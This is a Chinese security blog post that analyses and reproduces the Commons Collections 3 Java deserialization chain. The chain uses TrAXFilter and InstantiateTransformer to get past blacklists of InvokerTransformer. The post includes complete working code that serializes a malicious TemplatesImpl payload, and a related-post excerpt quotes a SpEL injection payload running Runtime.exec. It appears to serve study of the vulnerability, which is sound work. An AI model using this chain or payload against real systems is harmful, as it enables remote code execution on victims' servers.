CC3链分析与复现

最新推荐文章于 2024-06-06 08:00:00 发布
最新推荐文章于 2024-06-06 08:00:00 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: Java安全 文章标签: java 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42974824/article/details/126491260
版权

概述

CC3主要是使用动态类加载,与CC1和CC6不同,CC1/6是Runtime命令执行,CC3是类加载,然后初始化调用静态代码块。TemplatesImpl加载类和初始化。
CommonsCollections3的⽬的很明显,就是为了绕过⼀些规则对InvokerTransformer的限制。
CommonsCollections3并没有使⽤到InvokerTransformer来调⽤任意方法,⽽是⽤到了另⼀个
类, com.sun.org.apache.xalan.internal.xsltc.trax.**TrAXFilte**

调用链分析

在这里插入图片描述

TemplatesImpl#newTransformer() -> 
  TemplatesImpl#getTransletInstance() ->
    TemplatesImpl#defineTransletClasses()->
      TransletClassLoader#defineClass()  (类加载)

在defineClass类加载完成以后,又继续运行defineTransletClasses类,会调用newInstance()进行实例化,触发静态代码块。

SerialKiller是⼀个Java反序列化过滤器,可以通过⿊名单与⽩名单的⽅式来限制反序列化时允许通过的类。它的黑名单中就存在InvokerTransformer类,因此CC3为了绕过黑名单,使用了com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter类,这个类的构造方法中调⽤了(TransformerImpl) templates.newTransformer(),免去了我们使用InvokerTransformer手工调用newTransformer()方法这一步。
在这里插入图片描述
这⾥会⽤到⼀个新的 Transformer,就是org.apache.commons.collections.functors.InstantiateTransformer。InstantiateTransformer也是⼀个实现了Transformer接⼝的类,他的作⽤就是调⽤构造⽅法。所以,我们实现的⽬标就是,利⽤ InstantiateTransformer 来调⽤到 TrAXFilter 的构造⽅法,再利⽤其构造⽅法⾥的 templates.newTransformer() 调⽤到 TemplatesImpl ⾥的字节码。避免了使用InvokerTransformer

完整代码

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3TimplatesImpl {
    public static void main(String[] args) throws Exception {
        //TemplatesImpl中对加载的字节码是有一定要求的:
        //这个字节码对应的类必须是 com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet 的子类。
        byte[] data = Files.readAllBytes(Paths.get("E:\\code\\springboot-demo\\src\\main\\java\\com\\duziteng\\springbootdemo\\test\\classLoadTest\\RuntimeTemplatesImpl.class"));

        //TemplatesImpl内部类TransletClassLoader中有个方法defineClass来加载字节码
        //gadget: getOutputProperties -> newTransformer -> getTransletInstance -> defineTransletClasses -> defineClass
        TemplatesImpl obj = new TemplatesImpl();
        //设置变量的一些值来满足判断,保证代码能走到我们想要的位置
        setFieldValue(obj, "_bytecodes", new byte[][]{data}); // _bytecodes由字节码组成的数组
        setFieldValue(obj, "_name", "");//_name可以是任意字符串,只要不为null即可
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());//_tfactory 需要是一个 TransformerFactoryImpl 对象,因为TemplatesImpl#defineTransletClasses() 方法里有调用到_tfactory.getExternalExtensionsMap() ,如果是null会出错。

//        obj.newTransformer();//getTransletInstance -> defineTransletClasses -> newInstance

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),//TrAXFilter构造方法中接收一个transformer然后调用它的transformer方法
                //InstantiateTransformer用来实例化类,它的构造方法接收类的构造方法参数类型和参数值,transformer方法调用newInstance来实例化类
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{obj})
        };

//        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        ChainedTransformer chainedTransformer = new ChainedTransformer(new ConstantTransformer[]{new ConstantTransformer(1)});
        HashMap<Object, Object> hashMap = new HashMap<>();
        Map decorate = LazyMap.decorate(hashMap, chainedTransformer);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(decorate, "aa");
        HashMap<Object, Object> objectHashMap = new HashMap<>();
        objectHashMap.put(tiedMapEntry, "aa");

        decorate.clear();//清空,防止触发一次

        //替换ChainedTransformer为真实的Transformer
        Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
        iTransformers.setAccessible(true);
        iTransformers.set(chainedTransformer, transformers);

        serialize(objectHashMap);
        unSerialize();

    }

    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("D://ser2.bin"));
        objectOutputStream.writeObject(obj);
    }

    public static Object unSerialize() throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("D://ser2.bin"));
        return objectInputStream.readObject();
    }
    /**
     * setFieldValue()设置私有属性
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}
杜子腾1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Java安全学习笔记--反序列化漏洞利用链CC3
m0_64685672的博客
01-19 1245
测试环境 jdk1.7(jdk7u80) Commons Collections3.1 CC3链大体上是CC1和CC2链的结合,利用链核心原理基于CC2链的(动态字节码注入恶意类),使用TransformedMap和lazyMap配合cc1的annotationinvocation类触发newTransformer方法,所以CC3链不适用jdk1.8。 恶意类 import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun
jdk1.8.60,CC1链复现
11-29
1)bin:包含了最主要的是编译器(javac.exe)2)include:Java 和 JVM 交互用的头文件3)lib:类库4)jre:Java 运行环境JDK 有三种类型。1)J2SE:Standard Edition,标准版,是我们通常用的一个版本,从 JDK 5.0 ...
commons-collections3(cc3)反序列化链分析
遇事不决冲冲冲
03-10 2484
commons-collections3反序列化 cc3链和cc1想法还是很相似的,然后构造恶意类和调用使用了不同的两个新类 ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke()
Java反序列化-CC3链(1)
2401_84969746的博客
05-17 411
前面的CC1与CC6链都是通过 Runtime.exec() 进行命令执行的。当服务器的代码将 Runtime放入黑名单的时候就不能使用了。CC3链的好处是通过动态加载类的机制实现恶意类代码执行。
CC3链分析
sunyufei_666的博客
08-10 66
这里有个很关键的newInstance,这个就是我们需要实例化的关键方法,但是这个方法是私有方法,这里想要调用defineTransletClasses方法,需要_name不为空值,_class为空值(这个可以不用管),再往上看newTransformer方法。_bytecodes是一个二维字节类型的数组,但是传入defineClass中的_bytecodes是一个一维字节数组,赋值的时候需要赋一个一维字节类型数组,这里可以通过读取class文件,当作一个一维数组赋值给_bytecodes。
java反序列化cc3链分析
m0_64815693的博客
05-05 1464
java反序列化cc3链分析
Javaweb安全——反序列化漏洞-CC3
weixin_43610673的博客
07-06 939
CommonsCollections3是为了绕过一些规则对InvokerTransformer的限制而产生的,因为在CommonsCollections1中我们为了动态调用方法需要使InvokerTransformer这个类完成回调,被加入黑名单的话就切断了CommonsCollections1的利用链。上一篇文章的TemplatesImpl动态加载字节码刚好就有用武之地了,将原来的回调链替换掉变成直接加载字节码。先来看一个demo: 由CommonsCollections1 AnnotationInvoc
numpy复现马尔科夫链算法内含数据集
10-16
1. **状态与转移概率**:马尔科夫链由一系列状态组成,每个状态可以转移到其他状态。关键特征是“无后效性”,即当前状态只依赖于前一个状态,而不依赖于更早的状态。状态之间的转移概率是固定的。 2. **状态空间**...
语义分割模型 DeeplabV3plus 复现代码
07-23
本资源是语义分割模型 DeeplabV3plus 的 pytorch 复现,其 backbone 包括 Xception、Resnet101 和 MobilenetV2。 项目仅提供代码,没有给出训练后的模型!
C3D-lstm_lstmpytorch_c3d论文复现_C3D-lstm_
09-29
标题 "C3D-lstm_lstmpytorch_c3d论文复现_C3D-lstm" 指涉的是一项在PyTorch框架下对C3D-LSTM模型的实现,这是深度学习领域中用于视频理解的一个重要模型。C3D(Convolutional 3D)是基于3D卷积神经网络的预训练模型...
CommonsCollections CC3
jy13172的博客
07-22 147
java反序列化
Commons-Collections篇-CC3
最新发布
鸣蜩十四的博客
06-06 999
我们分析前两条链CC1和CC6时,都是利用invoke反射调用的Runtime().getRuntime().exec()来执行命令。而很多时候服务器的代码当中的黑名单会选择禁用Runtime。CC3链主要通过动态加载类加载机制来实现自动执行恶意类代码。
Java安全』反序列化-CC3反序列化漏洞POP链分析_ysoserial CommonsCollections3 PoC分析
Ho1aAs‘s Blog
03-11 789
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()2. InstantiateTransformer.transform()调用指定对象的指定类构造器3. LazyMap.get()调用this.factory.transform()构造ChainedTransformer生成lazyMap4. Proxy动态代理+AnnotationInvokerHandler调用LazyMap.get()5. Ann
10-java安全——java反序列化CC3和CC4链分析
网络安全
07-20 1931
漏洞分析环境: JDK1.7.0_80 apache commons collections-3.0 在maven项目中的pom文件中添加3.1版本的依赖 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version
Java反序列化-CC3
cike_y
04-22 436
CC3链笔记。CC3通过字节码文件,动态类加载来进行命令执行,达到绕过服务器的黑名单的一条链
CC2链分析复现
weixin_42974824的博客
08-25 1015
CC2链分析复现
CC6链分析复现
weixin_42974824的博客
08-18 655
CC6链分析复现
SpringBoot SpEL表达式注入漏洞-分析复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞复现 下面我将通过一个简单的漏洞复现来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值